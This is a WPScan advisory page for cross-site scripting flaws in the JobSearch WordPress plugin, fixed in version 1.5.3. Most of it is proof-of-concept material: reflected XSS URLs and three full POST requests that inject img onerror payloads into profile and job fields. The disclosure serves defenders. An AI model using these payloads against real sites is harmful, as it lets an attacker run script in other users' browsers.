WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

JobSearch < 1.5.3 - Multiple Cross-Site Scripting Issues

Description

An Unauthenticated Reflected & Multiple Authenticated Persistent XSS vulnerabilities was discovered in the JobSearch plugin through 1.5.1 and 1.5.2 for WordPress.

Authenticated Persistent XSS on the Candidate and Employer Profile pages.

An Authenticated Persistent XSS @ Job Page will trigger on the dashboard area /user-dashboard/?tab=manage-jobs and on the job page itself.

Proof of Concept

### [ PoC Unauthenticated Reflected XSS: ]

https://eyecix.com/plugins/jobsearch/?location=%22%20autofocus%20onfocus%3Dalert%28%60XSS%60%29%3B%20%22%3E
https://eyecix.com/plugins/jobsearch/?sector_cat=%22--%3E%3C%21--%3Cimg%20src%3D%22--%3E%3Cimg%20src%3Dx%20onerror%3D%28alert%29%28%60XSS%60%29%3B%2F%2F%22%3E1%22--%3E



### [ PoC Authenticated Persistent XSS -> Candidate User Profile: ]

[!] POST /plugins/jobsearch/user-dashboard/?tab=dashboard-settings HTTP/1.1
Host: eyecix.com
Content-Type: multipart/form-data; boundary=---------------------------27142012921130118151484572765
Content-Length: 6644
Origin: https://eyecix.com
Referer: https://eyecix.com/plugins/jobsearch/user-dashboard/?tab=dashboard-settings
Cookie: [cookies_here]

-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_cvr_photo_cand"; filename=""
Content-Type: application/octet-stream


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="u_firstname"

Vlad
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="u_lastname"

Vector
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_profile_slug"

vladvector
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_user_public_pview"

yes
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_user_dob_whole"



-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_phone"

1337"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="dial_code"

1337"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="contry_iso_code"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_sector"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_candidate_jobtitle"

1337"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_type"

type_1
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_currency"

default
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_pos"

left
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_sep"

,
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_deci"

2
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_bio"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="academic-level"

1337"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="Age"

1337"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="salary"

1337"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="gender"

1337"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="industry"

1337"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="cand_user_facebook_url"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="cand_user_twitter_url"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="cand_user_linkedin_url"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="cand_user_dribbble_url"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_location1"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_location2"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_location3"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_address"

1337"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_lat"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_lng"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_zoom"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_settings_form"

1
-----------------------------27142012921130118151484572765--



### [ PoC Authenticated Persistent XSS -> Employer User Profile: ]

[!] POST /plugins/jobsearch/user-dashboard/?tab=dashboard-settings HTTP/1.1
Host: eyecix.com
Content-Type: multipart/form-data; boundary=---------------------------321608141216835281602774802175
Content-Length: 6868
Origin: https://eyecix.com
Referer: https://eyecix.com/plugins/jobsearch/user-dashboard/?tab=dashboard-settings
Cookie: [cookies_here]

-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_cvr_photo"; filename=""
Content-Type: application/octet-stream


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="u_firstname"

Vlad
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="u_lastname"

Vector
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="display_name"

PoC
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_profile_slug"

vladvector
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_user_public_pview"

yes
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_phone"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="dial_code"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="contry_iso_code"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_website"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_sector"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_dob_mm"

1
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_dob_dd"

1
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_dob_yy"

1900
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_bio"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="founded-since"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="emp_user_facebook_url"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="emp_user_twitter_url"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="emp_user_linkedin_url"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="emp_user_dribbble_url"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_location1"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_location2"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_location3"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_address"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_lat"

37.090240
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_lng"

-95.712891
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_zoom"

12
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="team_image"; filename=""
Content-Type: application/octet-stream


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_title[]"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_designation[]"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_experience[]"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="team_image"; filename=""
Content-Type: application/octet-stream


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_image[]"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_facebook[]"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_google[]"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`)//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_twitter[]"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_linkedin[]"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_description[]"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_settings_form"

1
-----------------------------321608141216835281602774802175--



### [ PoC Authenticated Persistent XSS -> Job Page: ]

[!] POST /plugins/jobsearch/post-new-jobs/ HTTP/1.1
Host: eyecix.com
Content-Type: multipart/form-data; boundary=---------------------------35378657672420857749655614298
Content-Length: 5216
Origin: https://eyecix.com
Referer: https://eyecix.com/plugins/jobsearch/post-new-jobs/
Cookie: [cookies_here]

-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_title"

PoC
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_detail"

1337"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="application_deadline"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_sector"

12
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_type"

4
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="get_job_skills[]"

poc
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_apply_type"

internal
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_apply_url"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_apply_email"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_type"

type_1
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_max_salary"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_currency"

default
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_pos"

left
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_sep"

,
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_deci"

2
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="offered-salary"

31337"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="career-level"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="experience"

4-years"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="gender"

male"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="Industry"

graphics-designing"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="qualifications"

masters-degree"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_attach_files[]"; filename=""
Content-Type: application/octet-stream


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_location1"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_location2"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_location3"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_address"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_lat"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_lng"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_zoom"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="user_job_posting"

1
-----------------------------35378657672420857749655614298--

Affects Plugins

wp-jobsearch
Fixed in version 1.5.3

References

URL
https://codecanyon.net/item/jobsearch-wp-job-board-wordpress-plugin/21066856
URL
https://github.com/vladvector/vladvector.github.io/blob/master/exploit/2020-07-03-jobsearch-wp-job-board-wordpress-plugin-v1-5-1.txt
URL
https://github.com/vladvector/vladvector.github.io/blob/master/exploit/2020-07-05-jobsearch-wp-job-board-wordpress-plugin-v1-5-2.txt

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

Vlad Vector

Submitter

VLΛD VΞCTOR

Submitter website
https://vladvector.ru
Submitter twitter
vlad_vector
Verified

Yes

WPVDB ID
89e81b9f-88d2-4138-95a4-9ede93ccc6d3

Timeline

Publicly Published

2020-07-05 (about 2 years ago)

Added

2020-07-05 (about 2 years ago)

Last Updated

2020-07-08 (about 2 years ago)

Our Other Services

WPScan WordPress Security Plugin